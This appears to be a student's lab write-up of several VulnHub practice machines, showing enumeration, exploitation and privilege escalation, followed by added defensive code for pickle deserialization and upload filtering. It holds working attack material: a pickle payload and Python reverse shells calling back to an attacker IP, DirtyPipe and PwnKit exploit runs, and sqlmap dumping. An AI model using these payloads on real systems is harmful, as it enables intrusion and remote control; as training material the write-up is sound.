# Information System Security Testing and Assessment

# Lab 6: [LupinOne](https://www.hackingarticles.in/empire-lupinone-vulnhub-walkthrough/)

- Scan the network from Ubuntu to find the IP address of the LupinOne server

![](https://i.imgur.com/Pdy6OHt.png)

-> The server IP is 192.168.136.172

![](https://i.imgur.com/W4Ulkiu.png)

![](https://i.imgur.com/HQZ5gBB.png)

+ nmap scan of the server's ports and endpoints

![](https://i.imgur.com/QqDPC8v.png)

Alternatively, `/robots.txt` can be accessed directly

![](https://i.imgur.com/ndGjKm7.png)

+ `/~myfile`

![](https://i.imgur.com/EGHqSu4.png)

+ `ffuf -w seclist/common.txt -u http://192.168.138.172/~FUZZ -mc 200,301,401`

![](https://i.imgur.com/wb4wKFN.png)

![](https://i.imgur.com/0sPf6mY.png)

![](https://i.imgur.com/OTKMylo.png)

![](https://i.imgur.com/gc0Acas.png)

![](https://i.imgur.com/CtHq3yp.png)

![](https://i.imgur.com/s0D3ShH.png)

![](https://i.imgur.com/nK8Cw6z.png)

![](https://i.imgur.com/cF6IdJm.png)

=> `3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}`

```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
```

![](https://i.imgur.com/MxGex6V.png)

```
chmod +x linpeas.sh
./linpeas.sh
```

![](https://i.imgur.com/7qE1C4v.png)

![](https://i.imgur.com/ETDY3Z1.png)

![](https://i.imgur.com/FSROa1a.png)

[CVE-2022-0847-DirtyPipe-Exploits](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits)

```
git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
cd CVE-2022-0847-DirtyPipe-Exploits
chmod +x compile.sh
./compile.sh
```

![](https://i.imgur.com/8bmxWTB.png)

![](https://i.imgur.com/9YXVqTR.png)

```
cat /root/root.txt
```

**3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}**

----------

# Lab 7: [PHINEAS: 1](https://www.vulnhub.com/entry/phineas-1,674/)

![](https://i.imgur.com/hYp82X1.png)

![](https://i.imgur.com/xCTMM6n.png)

![](https://i.imgur.com/5NrvaY6.png)

![](https://i.imgur.com/wombrKO.png)

```
ffuf -u http://192.168.163.136/structure/FUZZ -w /tmp/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -e .txt,.html,.php -fc 403
```

![](https://i.imgur.com/jhb3vZU.png)

![](https://i.imgur.com/HULJNzJ.png)

```
git clone https://github.com/padsalatushal/CVE-2018-16763
cd CVE-2018-16763
python3 -m pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://192.168.136.163/structure/index.php
```

![](https://i.imgur.com/ls5bPEa.png)

![](https://i.imgur.com/QiBlOFR.png)

Read the database credentials from the source code

![](https://i.imgur.com/rWtTcKl.png)

-> username: anna, password: H993hfkNNid5kk

Connect using SSH

![](https://i.imgur.com/sJPPLpF.png)

Read the file `app.py`

![](https://i.imgur.com/cxqjgbt.png)

-> param: awesome

POC: https://gist.github.com/kriss-u/085569495cb930e398759c0cbf45e3b7

```python
#!/usr/bin/env python3
# poc_CVE2018-16763.py
import pickle
import sys
import base64

# Command to embed; can be overridden from the command line.
DEFAULT_COMMAND = "nc -e /bin/bash 192.168.163.131 9999"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND


class PickleRce(object):
    # __reduce__ tells the unpickler which callable to invoke and with what arguments.
    def __reduce__(self):
        import os
        return (os.system, (COMMAND,))


# The serialized object is base64-encoded so it can be sent as the `awesome` parameter.
print(base64.b64encode(pickle.dumps(PickleRce())).decode('utf-8'))
```

```
python3 poc_CVE2018-16763.py
gASVPwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCRuYyAtZSAvYmluL2Jhc2ggMTkyLjE2OC4xNjMuMTM2IDQ0NDSUhZRSlC4=
```

Flask runs on port 5000 by default

![](https://i.imgur.com/FGQdcKm.png)

![](https://i.imgur.com/sac9V2c.png)

POST the `awesome` data to the server running on http://127.0.0.1:5000/haven

![](https://i.imgur.com/RItJV04.png)

![](https://i.imgur.com/pHQi1BB.png)

![](https://i.imgur.com/K8Tj1zn.png)

-> Flag: `YW5uYW1hcmlhbmljb3NhbnRpdml2ZSE`

----

# Lab 8: [DarkHole2](https://www.vulnhub.com/entry/darkhole-2,740/)

![](https://i.imgur.com/pDaQ30E.jpg)

```
ffuf -u http://192.168.163.132/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.html,.php
```

![](https://i.imgur.com/n3W9Hyh.png)

![](https://i.imgur.com/K4bOuEy.png)

![](https://i.imgur.com/aMu7sN1.png)

Using [git dumper](https://github.com/arthaud/git-dumper), a tool to dump a git repository from a website.

```
pip install git-dumper
```

![](https://i.imgur.com/34QdWpU.png)

![](https://i.imgur.com/0Vvhc9m.png)

```
email: lush@admin.com
password: 321
```

![](https://i.imgur.com/rb40CVO.jpg)

After login

![](https://i.imgur.com/Kj93Gpo.png)

![](https://i.imgur.com/fcJ3jm7.png)

PHP Deobfuscator: https://www.unphp.net/decode/2b860fdd6a2eba03306e40a72bbcef50/

```
sqlmap -u http://192.168.163.132/dashboard.php?id=1 --dbms=MySQL --cookie='PHPSESSID=0j7sc15m8gfijv6tu9j43k32oc' --dump
```

![](https://i.imgur.com/KZhSpyf.png)

![](https://i.imgur.com/MtSCsch.png)

![](https://i.imgur.com/JjHQ6i1.png)

```
curl -Ls https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > bash
```

![](https://i.imgur.com/ucsgebx.png)

![](https://i.imgur.com/vYcjNJu.png)

POC: https://github.com/berdav/CVE-2021-4034

![](https://i.imgur.com/9yYSVCt.png)

![](https://i.imgur.com/VqtsbCK.png)

![](https://i.imgur.com/eFk0JhO.png)

![](https://i.imgur.com/r9vCOGc.png)

```
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://i.imgur.com/qx4AvjU.png)

![](https://i.imgur.com/TkzNQhl.png)

Flag: `DarkHole{'Legend'}`

-----

# Lab 9: [DarkHole1](https://www.vulnhub.com/entry/darkhole-1,724/)

![](https://i.imgur.com/fxZ5rZv.png)

![](https://i.imgur.com/SnHoSLZ.jpg)

Login form: sign up

![](https://i.imgur.com/aehjgp5.png)

```
username: test
passwd: test
```

![](https://i.imgur.com/ckMqtYH.png)

![](https://i.imgur.com/6pXRnZ1.png)

Change the password of user `test`

![](https://i.imgur.com/AT7AE8N.png)

The admin's userID is probably 1. We can change it by:

![](https://i.imgur.com/EUwOMoi.png)

Upload file

![](https://i.imgur.com/yRB0Ghr.png)

Uploading a PHP file is not allowed

![](https://i.imgur.com/QR8aKuR.png)

Changing the extension to `phtml` succeeds

![](https://i.imgur.com/uRZknqE.png)

Access the file

![](https://i.imgur.com/JapyCe9.png)

Reverse shell:

```
python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.163.131",4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn("sh")%27
```

![](https://i.imgur.com/OQOHX0Z.png)

![](https://i.imgur.com/dUKaT54.png)

john's password: root123

![](https://i.imgur.com/b3eioDI.png)

Root privilege escalation

![](https://i.imgur.com/jjMdg1K.png)

![](https://i.imgur.com/CZR6Imt.png)

-> Flag: `DarkHole{You_Can_DO_It}`

----

# Lab 10: [Prime 1](https://www.vulnhub.com/entry/prime-1,358/)

![](https://i.imgur.com/sxY1HpL.png)

![](https://i.imgur.com/J9LXZrA.png)

![](https://i.imgur.com/AC1Fzft.png)

![](https://i.imgur.com/lBfKMti.png)

![](https://i.imgur.com/Gc7vu3T.png)

![](https://i.imgur.com/pEpVlLb.png)

![](https://i.imgur.com/k2M9Sb4.png)

![](https://i.imgur.com/Zdui5zo.png)

-> victor's password: `follow_the_ippsec`

![](https://i.imgur.com/uQoeb7W.png)

![](https://i.imgur.com/gi9jQ5H.png)

![](https://i.imgur.com/LSsEETN.png)

![](https://i.imgur.com/8IpAuCw.png)

![](https://i.imgur.com/3rxZtGJ.png)

```
cat /home/saket/user.txt
af3c658dcf9d7190da3153519c003456
```

```
git clone https://github.com/berdav/CVE-2021-4034
```

Reverse shell

```
http://192.168.163.135/wordpress/wp-content/themes/twentynineteen/secret.php?0=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.163.131%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27
```
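Added example for the Lab 7 pickle PoC above (not code from the page, the gist, or the Phineas box): the `awesome` parameter ends up in `pickle.loads`, and the PoC works because unpickling imports and calls whatever `__reduce__` names. The block shows the two checks a defender would put in front of that call: disassembling the base64 payload with `pickletools` to list the globals it would import before anything runs, and a `find_class` allowlist that refuses them; the payloads are constructed inline and the empty allowlist is an assumption about what the app needs.

```python
import base64
import io
import pickle
import pickletools

# Constructed sample payloads. MALICIOUS has the same shape as the Lab 7 PoC:
# __reduce__ tells the unpickler to import os.system and call it. Building it
# only records that intent; nothing runs unless an unrestricted pickle.loads()
# is called on it, which this code never does.
class PickleRce:
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))

MALICIOUS = base64.b64encode(pickle.dumps(PickleRce())).decode()
BENIGN = base64.b64encode(pickle.dumps({"name": "anna", "awesome": True})).decode()


def referenced_globals(b64: str) -> list:
    """List the (module, name) pairs a pickle would import, without executing it.
    pickletools.genops only disassembles the opcode stream. The string tracking is
    deliberately minimal: enough to resolve the two operands STACK_GLOBAL pops
    (it ignores memo references, which a hardened version would also follow)."""
    strings, found = [], []
    for op, arg, _pos in pickletools.genops(base64.b64decode(b64)):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":          # protocols 0-3: arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":    # protocol 4+: operands are the last two strings
            found.append((strings[-2], strings[-1]))
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Refuse every global import except an explicit allowlist. It is empty here
    (assumption): plain dicts, strings and bools need no imports at all."""
    ALLOWED = set()

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def safe_loads(b64: str):
    """Drop-in replacement for pickle.loads(base64.b64decode(data))."""
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64))).load()
```

`referenced_globals` is the detection side (log or alert on any payload that names a global at all); `safe_loads` is the mitigation, though the real fix is to stop accepting pickle from clients and use JSON.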
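Added example for the Lab 9 upload bypass (not the DarkHole box's code): a blocklist that only rejects `.php` lets `shell.phtml` through, while an allowlist that ties one extension to the expected file signature rejects it. The blocklist shape, the accepted image types and the filename rule are assumptions, since the box's real check is not visible on the page.

```python
import os
import re

# Blocklist of the kind the Lab 9 form appears to use (assumption): the page
# shows ".php" rejected and ".phtml" accepted, which is exactly what this does.
BLOCKED_EXTENSIONS = {".php"}

# Allowlist: extension -> leading bytes ("magic") the uploaded content must start with.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Exactly one extension; no dots or path separators in the stem, so
# "shell.php.png" and "../x.png" style names never match.
SAFE_NAME = re.compile(r"[a-z0-9_-]{1,64}(\.[a-z0-9]{1,4})")


def blocklist_allows(filename: str) -> bool:
    """The weak check: only the listed extensions are refused, so any other
    extension the web server happens to execute (here .phtml) passes."""
    return os.path.splitext(filename)[1].lower() not in BLOCKED_EXTENSIONS


def allowlist_accepts(filename: str, head: bytes) -> bool:
    """The hardened check: name shape, extension and content must all agree.
    `head` is the first few bytes of the uploaded file."""
    base = os.path.basename(filename).lower()
    match = SAFE_NAME.fullmatch(base)
    if match is None:
        return False
    magic = ALLOWED_TYPES.get(match.group(1))
    return magic is not None and head.startswith(magic)
```

Storing the file under a server-generated name (never the client's) and serving the upload directory with script execution disabled are the other two halves of the fix; the page's bypass works because the name was kept and the directory executes `.phtml`.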